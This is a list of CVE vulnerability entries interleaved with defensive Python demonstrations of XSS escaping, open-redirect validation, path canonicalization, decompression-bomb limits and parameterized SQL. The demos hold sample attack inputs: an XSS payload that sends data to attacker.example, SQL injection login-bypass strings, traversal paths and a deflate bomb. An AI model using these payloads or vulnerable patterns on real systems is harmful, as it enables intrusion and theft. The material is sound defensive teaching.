
[CVE-2025-63666] [Modified: 17-11-2025] [Analyzed] [V3.1 S9.8:CRITICAL] Tenda AC15 v15.03.05.18_multi issues an authentication cookie that exposes the account password hash to the client and uses a short, low-entropy suffix as the session identifier. An attacker with network access, or the ability to run JavaScript in a victim's browser, can steal the cookie and replay it to access protected resources.

[CVE-2025-11366] [Modified: 14-11-2025] [Analyzed] [V3.1 S9.8:CRITICAL] N-central < 2025.4 is vulnerable to authentication bypass via path traversal

[CVE-2025-11367] [Modified: 14-11-2025] [Analyzed] [V3.1 S9.8:CRITICAL] The N-central Software Probe < 2025.4 is vulnerable to Remote Code Execution via deserialization

[CVE-2025-63289] [Modified: 05-01-2026] [Analyzed] [V3.1 S9.1:CRITICAL] Sogexia Android App (compile SDK 35, max SDK 32; fixed in v36) was discovered to contain hardcoded encryption keys in the encryption_helper.dart file.

[CVE-2025-63353] [Modified: 31-12-2025] [Analyzed] [V3.1 S9.8:CRITICAL] A vulnerability in FiberHome GPON ONU HG6145F1 RP4423 allows the device's factory default Wi-Fi password (WPA/WPA2 pre-shared key) to be predicted from the SSID. The device generates default passwords using a deterministic algorithm that derives the router passphrase from the SSID, enabling an attacker who can observe the SSID to predict the default password without authentication or user interaction.

[CVE-2025-64280] [Modified: 31-12-2025] [Analyzed] [V3.1 S9.8:CRITICAL] A SQL Injection Vulnerability in CentralSquare Community Development 19.5.7 allows attackers to inject SQL via the permit_no field.

[CVE-2025-64281] [Modified: 31-12-2025] [Analyzed] [V3.1 S9.8:CRITICAL] An Authentication Bypass issue in CentralSquare Community Development 19.5.7 allows attackers to access the admin panel without admin credentials.

[CVE-2025-11795] [Modified: 17-11-2025] [Analyzed] [V3.1 S7.8:HIGH] A maliciously crafted JPG file, when parsed through Autodesk 3ds Max, can force an Out-of-Bounds Write vulnerability. A malicious actor can leverage this vulnerability to execute arbitrary code in the context of the current process.

[CVE-2025-11797] [Modified: 17-11-2025] [Analyzed] [V3.1 S7.8:HIGH] A maliciously crafted DWG file, when parsed through Autodesk 3ds Max, can force a Use-After-Free vulnerability. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process.

[CVE-2025-13042] [Modified: 25-11-2025] [Analyzed] [V3.1 S8.8:HIGH] Inappropriate implementation in V8 in Google Chrome prior to 142.0.7444.166 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

[CVE-2025-52331] [Modified: 31-12-2025] [Analyzed] [V3.1 S6.1:MEDIUM] Cross-site scripting (XSS) vulnerability in the generate report functionality in Rarlab WinRAR 7.11, allows attackers to disclose user information such as the computer username, generated report directory, and IP address. The generate report command includes archived file names without validation in the HTML report, which allows potentially malicious HTML tags to be injected into the report. User interaction is required. User must use the "generate report" functionality and open the report.

[CVE-2025-59491] [Modified: 31-12-2025] [Analyzed] [V3.1 S6.1:MEDIUM] Cross Site Scripting vulnerability in CentralSquare Community Development 19.5.7 via form fields.

[CVE-2025-63419] [Modified: 31-12-2025] [Analyzed] [V3.1 S6.1:MEDIUM] Cross Site Scripting (XSS) vulnerability in CrushFTP 11.3.6_48. The web-based server has a file-sharing feature that reflects the filename into the emailbody field without sanitization, leading to HTML injection.
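The WinRAR report entry and the CrushFTP share entry above are the same bug class: an attacker-controlled file name is written into HTML without output encoding, so a name like `<img onerror=...>` becomes live markup when the report or e-mail body is rendered. The following is an added illustration, not code from WinRAR, CrushFTP or the advisories; the file names, the report layout and the report directory are constructed for the demo.

```python
import html
import re

# Constructed file names, as an attacker could plant them in an archive or a
# shared folder. Illustrative payloads, not ones taken from the advisories.
SAMPLE_NAMES = [
    "quarterly-report.pdf",
    '<img src=x onerror="fetch(\'http://attacker.example/?u=\'+navigator.userAgent)">',
    "<script>document.location='http://attacker.example/'</script>",
]


def render_report_vulnerable(names, report_dir="C:\\Users\\alice\\Reports"):
    """Interpolates names straight into the HTML report: the bug class above.
    The report directory (which contains the username) is in the same page,
    so injected script can read and exfiltrate it along with the rest."""
    rows = "".join(f"<tr><td>{name}</td></tr>" for name in names)
    return (f"<html><body><p>Report for {report_dir}</p>"
            f"<table>{rows}</table></body></html>")


def render_report_fixed(names, report_dir="C:\\Users\\alice\\Reports"):
    """Same report, but every untrusted string is HTML-escaped for element
    content; quote=True also encodes quotes so the value would be safe in an
    attribute as well."""
    rows = "".join(f"<tr><td>{html.escape(name, quote=True)}</td></tr>"
                   for name in names)
    return (f"<html><body><p>Report for {html.escape(report_dir, quote=True)}</p>"
            f"<table>{rows}</table></body></html>")


# Any element that the template itself never emits counts as injected markup.
INJECTED_TAG_RE = re.compile(r"<(?!/?(?:html|body|p|table|tr|td)\b)[a-z]",
                             re.IGNORECASE)


def has_injected_markup(document: str) -> bool:
    """Crude detector for the demo: does the rendered document contain an
    element outside the fixed set the template produces?"""
    return INJECTED_TAG_RE.search(document) is not None


if __name__ == "__main__":
    print("vulnerable report contains attacker markup:",
          has_injected_markup(render_report_vulnerable(SAMPLE_NAMES)))
    print("fixed report contains attacker markup:",
          has_injected_markup(render_report_fixed(SAMPLE_NAMES)))
```

`html.escape` is the right primitive for element content and quoted attribute values; a name that lands inside a `<script>` block, a URL, or an unquoted attribute needs a context-specific encoder instead, and a Content-Security-Policy on the generated report is a second layer that limits what injected markup can do.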

[CVE-2025-20378] [Modified: 03-12-2025] [Analyzed] [V3.1 S3.1:LOW] In Splunk Enterprise versions below 10.0.1, 9.4.5, 9.3.7, 9.2.9, and Splunk Cloud Platform versions below 10.0.2503.5, 9.3.2411.111, and 9.3.2408.121, an unauthenticated attacker could craft a malicious URL using the `return_to` parameter of the Splunk Web login endpoint. When an authenticated user visits the malicious URL, it could cause an unvalidated redirect to an external malicious site. To be successful, the attacker has to trick the victim into initiating a request from their browser. The unauthenticated attacker should not be able to exploit the vulnerability at will.
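The Splunk `return_to` entry above is a textbook open redirect: the login handler forwards the browser to whatever the parameter says once authentication succeeds. The fix is to accept only a same-origin, path-only target. The following added example is not Splunk code; the application origin and the default landing path are assumptions for the demo, and it covers the usual encoding and parser tricks (`//host`, `%2F%2Fhost`, backslashes, `javascript:`) beyond the single case the advisory describes.

```python
from urllib.parse import unquote, urljoin, urlsplit

# Hypothetical deployment origin; the real check must use the host the app is served on.
APP_ORIGIN = "https://splunk.example:8000"


def is_safe_return_to(value: str) -> bool:
    """Accept only a same-origin, path-only target for the post-login redirect."""
    if not value:
        return False
    candidate = unquote(value)  # decode once, so %2F%2F cannot hide a '//' prefix
    # Control characters and backslashes: browsers rewrite '\' to '/' and strip
    # tabs/newlines, so the server rejects them instead of trying to parse around them.
    if any(ord(ch) < 0x20 for ch in candidate) or "\\" in candidate:
        return False
    if not candidate.startswith("/") or candidate.startswith("//"):
        # relative paths, "//evil.example", "https://...", "javascript:..." all stop here
        return False
    parts = urlsplit(candidate)
    if parts.scheme or parts.netloc:
        return False  # belt and braces: nothing that still parses as an absolute URL
    # Resolve exactly as the browser will and confirm the host did not change.
    resolved = urlsplit(urljoin(APP_ORIGIN + "/", candidate))
    return resolved.netloc == urlsplit(APP_ORIGIN).netloc


def post_login_target(return_to: str, default: str = "/") -> str:
    """What the login handler redirects to once the user has authenticated:
    the requested path if it is safe, otherwise the application default."""
    return return_to if is_safe_return_to(return_to) else default


if __name__ == "__main__":
    for sample in ("/app/search?q=1", "https://attacker.example/", "//attacker.example/",
                   "%2F%2Fattacker.example", "/\\attacker.example", "javascript:alert(1)"):
        print(f"{sample!r:28} -> {post_login_target(sample)!r}")
```

An allow-list of known landing pages is stricter still and is the better choice where the set of post-login destinations is small; the function above is the general form for applications that must honour arbitrary deep links.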

[CVE-2025-20379] [Modified: 03-12-2025] [Analyzed] [V3.1 S3.5:LOW] In Splunk Enterprise versions below 10.0.1, 9.4.5, 9.3.7, and 9.2.9 and Splunk Cloud Platform versions below 9.3.2411.116, 9.3.2408.124, 10.0.2503.5 and 10.1.2507.1, a low-privileged user that does not hold the "admin" or "power" Splunk roles could run a saved search with a risky command using the permissions of a higher-privileged user to bypass the SPL safeguards for risky commands. They could bypass these safeguards on the "/services/streams/search" endpoint through its "q" parameter by circumventing endpoint restrictions using character encoding in the REST path. The vulnerability requires the attacker to phish the victim by tricking them into initiating a request within their browser. The authenticated user should not be able to exploit the vulnerability at will.
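The N-central authentication bypass via path traversal and the Splunk REST-path encoding bypass above share one root cause: the authorization check looks at the request path in a different form from the one the router eventually dispatches, so a percent-encoded or `..`-laden path slips past the check and still reaches the protected handler. The following added example is neither N-central nor Splunk code; the route policy is an assumption, and `/services/streams/search` is used only because the Splunk entry names it.

```python
import posixpath
from urllib.parse import unquote

# Hypothetical route policy: anything under these prefixes needs a session and
# a role check. /services/streams/search is the endpoint named in the entry above.
PROTECTED_PREFIXES = ("/services/", "/admin/")


def canonicalize(path: str) -> str:
    """Reduce a request path to the single form the router dispatches on:
    percent-decoded (a bounded number of times), '.', '..' and repeated '/'
    collapsed, no NUL or backslash. Raises ValueError when that is not possible."""
    decoded = path
    for _ in range(3):
        again = unquote(decoded)
        if again == decoded:
            break
        decoded = again
    else:
        raise ValueError("too many layers of percent-encoding")
    if "\x00" in decoded or "\\" in decoded:
        raise ValueError("forbidden character in path")
    if not decoded.startswith("/"):
        decoded = "/" + decoded
    normalized = posixpath.normpath(decoded)  # resolves '.', '..' and '//' inside the path
    while normalized.startswith("//"):       # normpath preserves a leading '//'; we do not
        normalized = normalized[1:]
    return normalized


def requires_auth_vulnerable(raw_path: str) -> bool:
    """Prefix match on the raw path. '/%73ervices/streams/search' and
    '/static/../services/streams/search' both look public here, yet a router
    that decodes and normalizes before dispatch serves the protected handler."""
    return raw_path.startswith(PROTECTED_PREFIXES)


def requires_auth_fixed(raw_path: str) -> bool:
    """Decide on the canonical path, and fail closed when canonicalization fails."""
    try:
        return canonicalize(raw_path).startswith(PROTECTED_PREFIXES)
    except ValueError:
        return True


if __name__ == "__main__":
    for p in ("/services/streams/search",
              "/%73ervices/streams/search",
              "/static/../services/streams/search",
              "/%252e%252e/services/streams/search"):
        print(f"{p:40} raw-check:{requires_auth_vulnerable(p)!s:6} "
              f"canonical-check:{requires_auth_fixed(p)}")
```

The durable fix is structural rather than a better filter: make the authorization decision on the exact path object the router has already produced, so there is no second parser to disagree with. Canonicalizing in front of the check, as above, is the fallback when the gate runs in a proxy or middleware that cannot see the router's view.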

[CVE-2025-60645] [Modified: 03-12-2025] [Analyzed] [V3.1 S6.5:MEDIUM] A Cross-Site Request Forgery (CSRF) in xxl-api v1.3.0 allows attackers to arbitrarily add users to the management module via a crafted GET request.

[CVE-2025-63811] [Modified: 31-12-2025] [Analyzed] [V3.1 S7.5:HIGH] An issue was discovered in dvsekhvalnov jose2go 1.5.0 thru 1.7.0 allowing an attacker to cause a Denial-of-Service (DoS) via crafted JSON Web Encryption (JWE) token with an exceptionally high compression ratio.
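A JWE whose protected header carries `"zip":"DEF"` holds a plaintext compressed with raw DEFLATE (RFC 7516, section 4.1.3, referencing RFC 1951), and the inflated size is not stated anywhere in the token. A decoder that inflates before checking size hands the sender a large allocation per token, which is the DoS described above. The defence is to cap the output while inflating, as the following added example shows; it is not jose2go code, and the 1 MiB cap and the constructed 32 MiB payload are assumptions for the demo.

```python
import zlib

MAX_PLAINTEXT = 1 << 20  # policy choice for the demo: refuse anything over 1 MiB inflated


def deflate_raw(data: bytes) -> bytes:
    """RFC 1951 raw DEFLATE (no zlib header), the encoding behind JWE 'zip':'DEF'."""
    c = zlib.compressobj(level=9, wbits=-15)
    return c.compress(data) + c.flush()


def inflate_unbounded(data: bytes) -> bytes:
    """The naive path: materialise whatever the stream expands to."""
    return zlib.decompress(data, wbits=-15)


def inflate_bounded(data: bytes, max_out: int = MAX_PLAINTEXT) -> bytes:
    """Inflate at most max_out bytes. zlib stops producing output at the limit;
    if input is left unconsumed, or the stream never reached its end marker,
    the token is rejected instead of being allowed to allocate further."""
    d = zlib.decompressobj(wbits=-15)
    out = d.decompress(data, max_out)
    if d.unconsumed_tail or not d.eof:
        raise ValueError(f"refusing JWE payload: inflated size exceeds {max_out} bytes "
                         f"or the stream is truncated")
    return out


def rejects(data: bytes, max_out: int = MAX_PLAINTEXT) -> bool:
    """True when inflate_bounded refuses the stream (convenience for checks)."""
    try:
        inflate_bounded(data, max_out)
    except ValueError:
        return True
    return False


# Constructed attack input: 32 MiB of zero bytes deflates to a few tens of KiB,
# so a naive decoder faces a roughly 1000:1 expansion for every such token.
BOMB = deflate_raw(b"\x00" * (32 << 20))


if __name__ == "__main__":
    print(f"bomb on the wire: {len(BOMB)} bytes, "
          f"inflated: {len(inflate_unbounded(BOMB))} bytes")
    print("bounded decoder rejects it:", rejects(BOMB))
    claims = b'{"sub":"alice"}'
    print("bounded decoder still accepts a normal payload:",
          inflate_bounded(deflate_raw(claims)) == claims)
```

In a JWE pipeline the cap belongs after decryption and authentication-tag verification and before the plaintext is handed to the JSON parser; the same bound should also apply to the ciphertext length up front, since decompression is only the last of several places where an oversized token costs memory.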

[CVE-2024-47866] [Modified: 31-12-2025] [Analyzed] [V3.1 S7.5:HIGH] Ceph is a distributed object, block, and file storage platform. In versions up to and including 19.2.3, using the argument `x-amz-copy-source` to put an object and specifying an empty string as its content leads to the RGW daemon crashing, resulting in a DoS attack. As of time of publication, no known patched versions exist.

[CVE-2025-13057] [Modified: 17-11-2025] [Analyzed] [V3.1 S6.3:MEDIUM] A vulnerability was identified in Campcodes School Fees Payment Management System 1.0. An unknown function of the file /ajax.php?action=save_student is affected. Manipulation of the argument ID leads to SQL injection. The attack may be initiated remotely. A public exploit is available and may be in use.

[CVE-2025-56385] [Modified: 31-12-2025] [Analyzed] [V3.1 S9.8:CRITICAL] A SQL injection vulnerability exists in the login functionality of WellSky Harmony version 4.1.0.2.83 within the 'xmHarmony.asp' endpoint. User-supplied input to the 'TXTUSERID' parameter is not properly sanitized before being incorporated into a SQL query. Successful exploitation may lead to authentication bypass, data leakage, or full compromise of backend database contents.
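Three entries above (CentralSquare `permit_no`, Campcodes `save_student` `ID`, WellSky `TXTUSERID`) are string-built SQL. The login case is the instructive one because the attacker needs to exfiltrate nothing: a payload in the username parameter rewrites the WHERE clause and the application logs them in. The following is an added example against SQLite, not WellSky's or any other vendor's code; the schema, the reuse of the `TXTUSERID` name, the password hashing and the payloads are assumptions for the demo.

```python
import hashlib
import hmac
import sqlite3


def pw_hash(password: str) -> str:
    """Placeholder hash for the demo only; a real login stores a slow, salted
    KDF output (Argon2id, scrypt or bcrypt), never a bare SHA-256."""
    return hashlib.sha256(password.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """In-memory users table with one account (constructed test data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (userid TEXT PRIMARY KEY, pwhash TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES (?, ?)",
                 ("admin", pw_hash("correct horse battery")))
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, txtuserid: str, password: str):
    """The bug class in the entries above: TXTUSERID is concatenated into the
    query text, so the caller controls the WHERE clause. Returns the userid
    the database matched, i.e. who the application believes just logged in."""
    sql = (f"SELECT userid FROM users WHERE userid = '{txtuserid}' "
           f"AND pwhash = '{pw_hash(password)}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(conn: sqlite3.Connection, txtuserid: str, password: str):
    """Same lookup with a bound parameter: the input is data, never SQL text.
    The hash comparison happens in Python with a constant-time compare, and an
    unknown user and a wrong password take the same code path."""
    row = conn.execute("SELECT userid, pwhash FROM users WHERE userid = ?",
                       (txtuserid,)).fetchone()
    if row is None or not hmac.compare_digest(row[1], pw_hash(password)):
        return None
    return row[0]


# Constructed payloads: the first names the account and comments out the
# password check; the second makes the predicate always true and comments
# out the rest, so the first row in the table (here the admin) is returned.
PAYLOADS = ["admin' -- ", "' OR 1=1 -- "]


if __name__ == "__main__":
    conn = make_db()
    for payload in PAYLOADS:
        print(f"{payload!r:16} vulnerable -> {login_vulnerable(conn, payload, 'wrong')!r}, "
              f"fixed -> {login_fixed(conn, payload, 'wrong')!r}")
    print("legitimate login:", login_fixed(conn, "admin", "correct horse battery"))
```

Parameter binding removes the injection regardless of which field is attacked, which is why it is the fix for the `permit_no` and `ID` cases as well; input "sanitization" of quotes, by contrast, has to anticipate every quoting rule of the target dialect and is not a substitute.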